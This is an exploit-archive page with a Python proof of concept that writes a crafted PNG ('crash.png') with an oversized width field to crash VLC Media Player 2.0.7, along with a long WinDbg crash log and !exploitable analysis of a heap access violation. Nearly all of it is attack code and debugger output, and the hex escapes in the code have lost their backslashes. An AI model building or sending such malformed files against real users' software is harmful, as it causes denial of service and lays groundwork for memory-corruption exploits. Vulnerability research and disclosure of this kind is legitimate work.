[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : VLC Media Player 2.0.7 (.png) - Crash PoC
# Published : 2013-07-01
# Author :
# Previous Title : Windows Movie Maker Version 2.1.4026.0 (.wav) - Crash POC
# Next Title : Microsoft Office PowerPoint 2007 - Crash PoC
#!/usr/bin/python
# VLC Media Player 2.0.7 PNG Crash PoC
# Vendor Homepage: http://www.videolan.org/
# Version: 2.0.7
# Tested on: Windows 7 64-bit
# Author: Kevin Fujimoto
# Debug Information:
# Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
# *** wait with pending attach
# Symbol search path is: SRV*g:symbols*http://msdl.microsoft.com/download/symbols
# Executable search path is:
# ModLoad: 00400000 00425000 G:Program Files (x86)VideoLANVLCvlc.exe
# ModLoad: 775b0000 77730000 C:WindowsSysWOW64ntdll.dll
# ModLoad: 750f0000 75200000 C:Windowssyswow64kernel32.dll
# ModLoad: 76100000 76147000 C:Windowssyswow64KERNELBASE.dll
# ModLoad: 623e0000 6240c000 G:Program Files (x86)VideoLANVLClibvlc.dll
# ModLoad: 50420000 5066d000 G:Program Files (x86)VideoLANVLClibvlccore.dll
# ModLoad: 75ab0000 75b50000 C:Windowssyswow64ADVAPI32.dll
# ModLoad: 76170000 7621c000 C:Windowssyswow64msvcrt.dll
# ModLoad: 76150000 76169000 C:WindowsSysWOW64sechost.dll
# ModLoad: 75210000 75300000 C:Windowssyswow64RPCRT4.dll
# ModLoad: 75000000 75060000 C:Windowssyswow64SspiCli.dll
# ModLoad: 74ff0000 74ffc000 C:Windowssyswow64CRYPTBASE.dll
# ModLoad: 76390000 76fda000 C:Windowssyswow64SHELL32.DLL
# ModLoad: 76230000 76287000 C:Windowssyswow64SHLWAPI.dll
# ModLoad: 75dd0000 75e60000 C:Windowssyswow64GDI32.dll
# ModLoad: 75ca0000 75da0000 C:Windowssyswow64USER32.dll
# ModLoad: 760f0000 760fa000 C:Windowssyswow64LPK.dll
# ModLoad: 75bf0000 75c8d000 C:Windowssyswow64USP10.dll
# ModLoad: 71880000 718b2000 C:Windowssystem32WINMM.DLL
# ModLoad: 75590000 755c5000 C:Windowssyswow64WS2_32.dll
# ModLoad: 75300000 75306000 C:Windowssyswow64NSI.dll
# ModLoad: 75730000 75735000 C:Windowssyswow64PSAPI.DLL
# ModLoad: 75750000 75908000 C:Windowssyswow64WININET.DLL
# ModLoad: 75be0000 75be4000 C:Windowssyswow64api-ms-win-downlevel-user32-l1-1-0.dll
# ModLoad: 77580000 77585000 C:Windowssyswow64api-ms-win-downlevel-advapi32-l1-1-0.dll
# ModLoad: 76220000 76224000 C:Windowssyswow64api-ms-win-downlevel-shlwapi-l1-1-0.dll
# ModLoad: 75c90000 75c94000 C:Windowssyswow64api-ms-win-downlevel-version-l1-1-0.dll
# ModLoad: 74df0000 74df9000 C:Windowssystem32version.DLL
# ModLoad: 75a40000 75a43000 C:Windowssyswow64api-ms-win-downlevel-normaliz-l1-1-0.dll
# ModLoad: 75740000 75743000 C:Windowssyswow64normaliz.DLL
# ModLoad: 75310000 75508000 C:Windowssyswow64iertutil.dll
# ModLoad: 75a50000 75ab0000 C:Windowssystem32IMM32.DLL
# ModLoad: 762c0000 7638c000 C:Windowssyswow64MSCTF.dll
# ModLoad: 10000000 10059000 C:WindowsSysWOW64guard32.dll
# ModLoad: 74de0000 74de7000 C:Windowssystem32fltlib.dll
# ModLoad: 755d0000 7572c000 C:Windowssyswow64ole32.dll
# ModLoad: 73d90000 73d9b000 C:Windowssystem32profapi.dll
# ModLoad: 720f0000 72170000 C:Windowssystem32uxtheme.dll
# ModLoad: 73cb0000 73cc3000 C:Windowssystem32dwmapi.dll
# ModLoad: 71f50000 720ee000 C:WindowsWinSxSx86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2comctl32.dll
# ModLoad: 75060000 750e3000 C:Windowssyswow64CLBCatQ.DLL
# ModLoad: 75b50000 75bdf000 C:Windowssyswow64OLEAUT32.dll
# ModLoad: 61070000 610bc000 G:Program Files (x86)VideoLANVLCpluginsaccesslibdshow_plugin.dll
# ModLoad: 5bf20000 5bf3c000 G:Program Files (x86)VideoLANVLCpluginsaudio_outputlibaout_directx_plugin.dll
# ModLoad: 5bf00000 5bf1d000 G:Program Files (x86)VideoLANVLCpluginsaudio_outputlibwaveout_plugin.dll
# ModLoad: 5b850000 5b874000 G:Program Files (x86)VideoLANVLCpluginsvideo_outputlibdirectx_plugin.dll
# ModLoad: 5b830000 5b849000 G:Program Files (x86)VideoLANVLCpluginsmmxextlibmemcpymmxext_plugin.dll
# ModLoad: 5b7f0000 5b82f000 G:Program Files (x86)VideoLANVLCpluginsaccessliblibbluray_plugin.dll
# ModLoad: 59020000 59048000 G:Program Files (x86)VideoLANVLCpluginsaccesslibaccess_bd_plugin.dll
# ModLoad: 57fb0000 58001000 G:Program Files (x86)VideoLANVLCpluginsaccesslibdvdnav_plugin.dll
# ModLoad: 5b7d0000 5b7eb000 G:Program Files (x86)VideoLANVLCpluginsaccesslibaccess_vdr_plugin.dll
# ModLoad: 5b760000 5b77b000 G:Program Files (x86)VideoLANVLCpluginsaccesslibfilesystem_plugin.dll
# ModLoad: 50830000 508ac000 G:Program Files (x86)VideoLANVLCpluginsstream_filterlibstream_filter_httplive_plugin.dll
# ModLoad: 50370000 50420000 G:Program Files (x86)VideoLANVLCpluginsstream_filterlibstream_filter_dash_plugin.dll
# ModLoad: 59060000 5907a000 G:Program Files (x86)VideoLANVLCpluginsaccesslibstream_filter_rar_plugin.dll
# ModLoad: 58040000 58065000 G:Program Files (x86)VideoLANVLCpluginsaccesslibzip_plugin.dll
# ModLoad: 58020000 58039000 G:Program Files (x86)VideoLANVLCpluginsstream_filterlibstream_filter_record_plugin.dll
# ModLoad: 57bb0000 57bda000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibplaylist_plugin.dll
# ModLoad: 50210000 5036f000 G:Program Files (x86)VideoLANVLCpluginsmeta_enginelibtaglib_plugin.dll
# ModLoad: 57b50000 57baa000 G:Program Files (x86)VideoLANVLCpluginslualiblua_plugin.dll
# ModLoad: 500c0000 50202000 G:Program Files (x86)VideoLANVLCpluginsmisclibxml_plugin.dll
# ModLoad: 57cd0000 57ced000 G:Program Files (x86)VideoLANVLCpluginscontrollibhotkeys_plugin.dll
# ModLoad: 57970000 57989000 G:Program Files (x86)VideoLANVLCpluginscontrollibglobalhotkeys_plugin.dll
# ModLoad: 68cf0000 697d9000 G:Program Files (x86)VideoLANVLCpluginsguilibqt4_plugin.dll
# ModLoad: 75510000 7558b000 C:Windowssyswow64COMDLG32.DLL
# ModLoad: 72230000 72281000 C:Windowssystem32WINSPOOL.DRV
# ModLoad: 72330000 72337000 C:Windowssystem32WSOCK32.DLL
# ModLoad: 73da0000 73db7000 C:Windowssystem32userenv.dll
# ModLoad: 72200000 72216000 C:Windowssystem32CRYPTSP.dll
# ModLoad: 72180000 721bb000 C:Windowssystem32rsaenh.dll
# ModLoad: 73a60000 73a6e000 C:Windowssystem32RpcRtRemote.dll
# ModLoad: 507d0000 50828000 G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibupnp_plugin.dll
# ModLoad: 72650000 7266c000 C:Windowssystem32IPHLPAPI.DLL
# ModLoad: 72640000 72647000 C:Windowssystem32WINNSI.DLL
# ModLoad: 57940000 57965000 G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibsap_plugin.dll
# ModLoad: 57160000 5717a000 G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibpodcast_plugin.dll
# ModLoad: 56d90000 56daa000 G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibmediadirs_plugin.dll
# ModLoad: 507b0000 507c9000 G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibwindrive_plugin.dll
# ModLoad: 62da0000 62f0f000 C:Windowssystem32explorerframe.dll
# ModLoad: 62d70000 62d9f000 C:Windowssystem32DUser.dll
# ModLoad: 62cb0000 62d62000 C:Windowssystem32DUI70.dll
# ModLoad: 730c0000 73144000 C:WindowsWinSxSx86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149afcomctl32.dll
# ModLoad: 77c00000 77c40000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibmp4_plugin.dll
# ModLoad: 77bd0000 77bf5000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibavi_plugin.dll
# ModLoad: 77ba0000 77bc2000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibasf_plugin.dll
# ModLoad: 77b80000 77b9b000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibflacsys_plugin.dll
# ModLoad: 50790000 507ab000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibes_plugin.dll
# ModLoad: 69830000 69857000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibmpc_plugin.dll
# ModLoad: 61c90000 61cab000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibnuv_plugin.dll
# ModLoad: 6bbb0000 6bbca000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibtta_plugin.dll
# ModLoad: 675f0000 6760b000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibwav_plugin.dll
# ModLoad: 6aaf0000 6abdb000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibsid_plugin.dll
# ModLoad: 69d90000 69eb8000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibmkv_plugin.dll
# ModLoad: 6ccd0000 6cd86000 G:Program Files (x86)VideoLANVLCpluginsdemuxliblive555_plugin.dll
# ModLoad: 6ef10000 6ef3b000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibogg_plugin.dll
# ModLoad: 70950000 70969000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibdirac_plugin.dll
# ModLoad: 644f0000 6450a000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibsmf_plugin.dll
# ModLoad: 64370000 6438a000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibrawvid_plugin.dll
# ModLoad: 6c2c0000 6c2da000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibpva_plugin.dll
# ModLoad: 6a510000 6a53f000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibts_plugin.dll
# ModLoad: 67f30000 67f4a000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibnsv_plugin.dll
# ModLoad: 6f980000 6f999000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibau_plugin.dll
# ModLoad: 6a6e0000 6a74f000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibgme_plugin.dll
# ModLoad: 6c5e0000 6c5fa000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibvoc_plugin.dll
# ModLoad: 64810000 64829000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibxa_plugin.dll
# ModLoad: 071a0000 072ad000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibmod_plugin.dll
# ModLoad: 66c10000 66c2a000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibaiff_plugin.dll
# ModLoad: 060b0000 060cb000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibimage_plugin.dll
# ModLoad: 77b40000 77b7e000 G:Program Files (x86)VideoLANVLCpluginscodeclibpng_plugin.dll
# (1e8c.1954): Access violation - code c0000005 (!!! second chance !!!)
# eax=072b0048 ebx=00ab0000 ecx=00000000 edx=00000000 esi=072b0040 edi=00ab0000
# eip=775eb6d8 esp=0658daf4 ebp=0658dbc4 iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
# ntdll!RtlpAllocateHeap+0x7fb:
# 775eb6d8 8b09 mov ecx,dword ptr [ecx] ds:002b:00000000=????????
# 0:009> !exploitable -v
# HostMachineHostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Module load completed but symbols could not be loaded for G:Program Files (x86)VideoLANVLCvlc.exe
# Exception Faulting Address: 0x0
# Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Read Access Violation
# Faulting Instruction:775eb6d8 mov ecx,dword ptr [ecx]
# Basic Block:
# 775eb6d8 mov ecx,dword ptr [ecx]
# Tainted Input Operands: ecx
# 775eb6da mov edx,dword ptr [edx+4]
# 775eb6dd cmp ecx,edx
# Tainted Input Operands: ecx
# 775eb6df jne ntdll!rtlpallocateheap+0x8e4 (7763af86)
# Tainted Input Operands: ZeroFlag
# Exception Hash (Major/Minor): 0x65193219.0x71557302
# Stack Trace:
# ntdll!RtlpAllocateHeap+0x7fb
# ntdll!RtlAllocateHeap+0x23a
# msvcrt!_calloc_impl+0x136
# msvcrt!_calloc_crt+0x16
# msvcrt!_getbuf+0x11
# msvcrt!_flsbuf+0x94
# msvcrt!_fputwc_nolock+0xd5
# msvcrt!fputwc+0x51
# vlc+0x5975
# vlc+0x97ee
# vlc+0x700b
# msvcrt!_wsopen_s+0x1b
# msvcrt!_unlock+0x15
# msvcrt!_iob+0x60
# ntdll!ExecuteHandler2+0x26
# Instruction Address: 0x00000000775eb6d8
# Description: Data from Faulting Address controls Branch Selection
# Short Description: TaintedDataControlsBranchSelection
# Exploitability Classification: UNKNOWN
# Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at ntdll!RtlpAllocateHeap+0x00000000000007fb called from msvcrt!_calloc_impl+0x0000000000000136 (Hash=0x65193219.0x71557302)
# The data from the faulting address is later used to determine whether or not a branch is taken.
out = (
"x89x50x4Ex47x0Dx0Ax1Ax0A" # PNG signature
"x00x00x00x0D" # IHDR size
"x49x48x44x52" # IHDR chunk
"x7FxFFxFFxFF" # width
"x00x00x01x02" # height
"x01" # bit depth
"x03" # color type
"x00" # compression method
"x00" # filter method
"x00" # interlace method
"xBAx1BxD8x84" # IHDR chunk CRC
"x00x00x00x03" # PLTE size
"x50x4Cx54x45" # PLTE chunk
"xFF" # red
"xFF" # green
"xFF" # blue
"xA7xC4x1BxC8" # PLTE chunk CRC
"x00x00x00x01" # tRNS size
"x74x52x4Ex53" # tRNS chunk
"x00" # alpha
"x40xE6xD8x66" # tRNS chunk CRC
"x00x00x00x01" # IDAT size
"x49x44x41x54" # IDAT chunk
"xFF" # image data
"x05x3Ax92x65" # IDAT chunk CRC
"x00x00x00x00" # IEND size
"x49x45x4Ex44" # IEND chunk
"xAEx42x60x82" # IEND chunk CRC
)
print "Writing file..."
file = open('crash.png', 'wb')
file.write(out)
file.close()
print "File written!"